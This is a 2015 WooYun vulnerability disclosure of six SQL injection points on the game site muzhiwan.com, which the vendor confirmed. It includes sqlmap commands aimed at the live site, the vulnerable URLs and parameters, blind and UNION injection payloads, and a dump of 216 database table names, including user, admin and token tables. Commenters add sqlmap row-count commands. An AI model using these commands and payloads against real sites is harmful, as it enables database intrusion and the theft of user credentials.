当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124079

漏洞标题:拇指玩SQL注入6枚(涉及至少800W+用户数据含账号密码)

相关厂商:muzhiwan.com

漏洞作者: 凌零1

提交时间:2015-07-02 17:56

修复时间:2015-08-16 18:06

公开时间:2015-08-16 18:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-02: 细节已通知厂商并且等待厂商处理中
2015-07-02: 厂商已经确认,细节仅向厂商公开
2015-07-12: 细节向核心白帽子及相关领域专家公开
2015-07-22: 细节向普通白帽子公开
2015-08-01: 细节向实习白帽子公开
2015-08-16: 细节向公众公开

简要描述:

泄露管理员账号密码,及大量用户信息

详细说明:

python sqlmap.py -u "http://www.muzhiwan.com/index.php?action=article&opt=comment_list" --data "aid=&num=1" -p "aid" --level 3 --dbs
1.www.muzhiwan.com/index.php?action=article&opt=comment_list post:aid=&num=1 aid处
2.www.muzhiwan.com/index.php?.exe&action=common&opt=speeddownpc&vid= vid处
3.www.muzhiwan.com/index.php?
action=common&opt=otherdown&url=aHR0cDovL3Bhbi5iYWlkdS5jb20vcy8x
Z2RLcnBFYg==&vid=&wpclick=2 vid处
4.www.muzhiwan.com/index.php?action=common&opt=speeddown&vid= vid处
5.www.muzhiwan.com/index.php?action=game&opt=getAjaxComment post:num=1&vid= vid处
6,http://gsv.muzhiwan.com/index.php?action=detail&opt=getAjaxComment post:num=1&sid= sid处

漏洞证明:

拿第一条试试吧!www.muzhiwan.com/index.php?action=article&opt=comment_list post:aid=&num=1

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: aid (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: aid=(SELECT (CASE WHEN (7953=7953) THEN SLEEP(5) ELSE 7953*(SELECT
7953 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&num=1
Type: UNION query
Title: Generic UNION query (random number) - 5 columns
Payload: aid=-7257 UNION ALL SELECT CONCAT(0x71786b7671,0x61414a4b725468786e
6f,0x717a626271),1271,1271,1271,1271-- &num=1
---
[11:25:31] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.14
back-end DBMS: MySQL 5.0.12
[11:25:31] [INFO] fetching current database
current database: 'mzw'
[11:25:31] [INFO] fetched data logged to text files under 'C:\Users\wjl\.sqlmap\
output\www.muzhiwan.com'
[*] shutting down at 11:25:31
C:\Users\wjl\Desktop\sqlmapproject-sqlmap-e8f87bf>python sqlmap.py -u "http://ww
w.muzhiwan.com/index.php?action=article&opt=comment_list " --data "aid=&num=1" -
p "aid" --level 3 --current-db


RH$10D~5A`9VR@~3}E6YD3N.png


Database: mzw
[216 tables]
+--------------------------------+
| group |
| mzw_users-1 |
| auth |
| auth_group |
| auth_group_relation |
| auth_usergroup |
| group_apply |
| group_glance |
| group_identity |
| group_interior |
| group_member |
| group_member_log |
| group_recommend |
| group_report |
| group_score |
| group_score_list |
| group_topic |
| group_topic_content |
| group_topic_love |
| lanxun_url |
| market_model_info |
| models |
| mzw_ad |
| mzw_ad_p |
| mzw_admin |
| mzw_admin_editlog |
| mzw_admin_gameeditlog |
| mzw_admin_group |
| mzw_bbs_topic |
| mzw_blacklist |
| mzw_c_ad |
| mzw_c_admin |
| mzw_c_channel |
| mzw_c_game |
| mzw_c_game_detail |
| mzw_c_game_down |
| mzw_c_game_snapshot |
| mzw_c_hotsearch |
| mzw_c_uc_mapping |
| mzw_censorword |
| mzw_content_from |
| mzw_cp_bill |
| mzw_cp_contact |
| mzw_cp_fee_ratio |
| mzw_cp_game |
| mzw_cp_game_1 |
| mzw_cp_game_append |
| mzw_cp_game_gift |
| mzw_cp_game_gift_code |
| mzw_cp_game_sdk |
| mzw_cp_game_v |
| mzw_cp_game_v_article |
| mzw_cp_game_v_img |
| mzw_cp_game_v_motion |
| mzw_cp_member |
| mzw_cp_msg |
| mzw_cp_notice |
| mzw_cp_order |
| mzw_cp_pay |
| mzw_cp_sdk |
| mzw_cp_testfee |
| mzw_cp_testin |
| mzw_cp_user |
| mzw_cp_users_resetpwd |
| mzw_crack_wishing |
| mzw_crontab_game |
| mzw_dabaoprogress |
| mzw_datacopypath |
| mzw_day_gamecount |
| mzw_exam_score |
| mzw_exam_title |
| mzw_favorite |
| mzw_feedback |
| mzw_feedback_app |
| mzw_feeds |
| mzw_fetch_html |
| mzw_friend_links |
| mzw_game |
| mzw_game_album |
| mzw_game_album_comment |
| mzw_game_album_comment_reply |
| mzw_game_album_contents |
| mzw_game_article |
| mzw_game_article_auth |
| mzw_game_article_comment |
| mzw_game_article_comment_reply |
| mzw_game_article_detail |
| mzw_game_article_detail_copy |
| mzw_game_article_type |
| mzw_game_article_vote |
| mzw_game_black |
| mzw_game_device_package |
| mzw_game_extend |
| mzw_game_firm |
| mzw_game_firm_comment |
| mzw_game_firm_comment_reply |
| mzw_game_google |
| mzw_game_img_webp |
| mzw_game_net_forum |
| mzw_game_net_gift |
| mzw_game_net_giftbind |
| mzw_game_net_server |
| mzw_game_open |
| mzw_game_search_tags |
| mzw_game_search_tags_bind |
| mzw_game_tags |
| mzw_game_tags_bind |
| mzw_game_tags_type |
| mzw_game_tmp |
| mzw_game_type |
| mzw_game_unzip |
| mzw_game_unzip_diff |
| mzw_game_unzip_sub |
| mzw_game_v |
| mzw_game_v_comment |
| mzw_game_v_comment_reply |
| mzw_game_v_cp |
| mzw_game_v_detail |
| mzw_game_v_diff |
| mzw_game_v_downlist |
| mzw_game_v_downlist_back |
| mzw_game_v_downlist_copy |
| mzw_game_v_downtop |
| mzw_game_v_icon_temp |
| mzw_game_v_img |
| mzw_game_v_img_copy |
| mzw_game_v_img_temp |
| mzw_game_v_video |
| mzw_game_vblacklist |
| mzw_game_vote |
| mzw_gift_bbs |
| mzw_gift_weixin |
| mzw_gift_weixin_copy |
| mzw_gift_weixin_copy1 |
| mzw_google_apps |
| mzw_handle_brand |
| mzw_handle_model |
| mzw_hotword_tab |
| mzw_log_ad_click_201302 |
| mzw_log_downloadgame_0 |
| mzw_log_goodarticle_0 |
| mzw_log_goodgame_0 |
| mzw_log_goodsavegame_2013 |
| mzw_log_login_201301 |
| mzw_log_sf_download_0 |
| mzw_mobile_brand |
| mzw_mobile_cpubrand |
| mzw_mobile_cpubrand_adp |
| mzw_mobile_cpumodel |
| mzw_mobile_forum |
| mzw_mobile_manual_pwd |
| mzw_mobile_model |
| mzw_mobile_modelcode |
| mzw_mobile_modelcode_rel |
| mzw_mobile_verify_message |
| mzw_models |
| mzw_our_company |
| mzw_our_postinfo |
| mzw_pay |
| mzw_pc_feedback |
| mzw_phone_msg_log |
| mzw_project |
| mzw_project_picture |
| mzw_question |
| mzw_question_answer |
| mzw_report_tab |
| mzw_save_game |
| mzw_save_game_blacklist |
| mzw_save_game_category |
| mzw_save_game_comment |
| mzw_save_game_comment_reply |
| mzw_save_game_for |
| mzw_save_game_for_comment |
| mzw_save_game_img |
| mzw_save_game_send |
| mzw_save_gamenotexistgame |
| mzw_sdk_oauth2_authcodes |
| mzw_sdk_oauth2_clients |
| mzw_sdk_oauth2_tokens |
| mzw_sdk_pay_notifyrecord |
| mzw_sdk_pay_orders |
| mzw_sdk_pay_orders_info |
| mzw_sdk_pay_yeepaytoken |
| mzw_sdk_phone_msg_log |
| mzw_short_url |
| mzw_short_url_key |
| mzw_snoopy_game |
| mzw_snoopy_gift |
| mzw_u_test |
| mzw_update |
| mzw_user_game |
| mzw_user_gamev |
| mzw_user_gamevcomment |
| mzw_user_gamevcomment_reply |
| mzw_user_gamevdetail |
| mzw_user_gamevdownlist |
| mzw_user_gamevimg |
| mzw_user_reg |
| mzw_userbehavior |
| mzw_userdevice |
| mzw_userdevice_bind |
| mzw_users |
| mzw_users_1 |
| mzw_users_6 |
| mzw_users_accesstoken |
| mzw_users_origin |
| mzw_users_phone |
| mzw_users_photo_create |
| mzw_users_profile |
| mzw_users_resetpwd |
| mzw_users_sign |
| mzw_weibo_score |
| mzw_zhuanti_comment |
| pre_ucenter_members_cpfrom502 |
| static_sdk_compatibility |
| tmp_02 |
+--------------------------------+


看下其中一个表

YSZYQ`933CXCIS5V549GK%O.png


7W{{}68V(@W8FF@%4))844H.jpg


修复方案:

不忽略就ok,高rank- -!!

版权声明:转载请注明来源 凌零1@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-07-02 18:04

厂商回复:

谢谢,我们会抓紧时间修复

最新状态:

暂无


漏洞评价:

评论

  1. 2015-07-02 18:05 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    秒确认

  2. 2015-07-02 18:06 | 天地不仁 以万物为刍狗 ( 普通白帽子 | Rank:977 漏洞数:264 | 天地本不仁 万物为刍狗)

    还有注入?

  3. 2015-07-02 18:07 | 天地不仁 以万物为刍狗 ( 普通白帽子 | Rank:977 漏洞数:264 | 天地本不仁 万物为刍狗)

    @浩天 拇指玩一直都是秒确认的····

  4. 2015-07-02 18:32 | 镱鍚 ( 路人 | Rank:6 漏洞数:4 | 。。!)

    6666

  5. 2015-07-02 19:06 | answer ( 普通白帽子 | Rank:347 漏洞数:45 | 答案)

    膜拜

  6. 2015-08-16 21:37 | 日出东方 ( 普通白帽子 | Rank:157 漏洞数:51 )

    大神,800万数据怎么计算的。。

  7. 2015-08-17 09:20 | h3hz ( 路人 | Rank:15 漏洞数:1 | 新手求收留)

    @日出东方 select count('字段') from 表名

  8. 2015-08-17 09:23 | 日出东方 ( 普通白帽子 | Rank:157 漏洞数:51 )

    @h3hz 多谢

  9. 2015-08-17 21:07 | mtfly ( 路人 | Rank:26 漏洞数:6 | 啥都不会)

    @日出东方 sqlmap -u "url" -D=database -T=table --count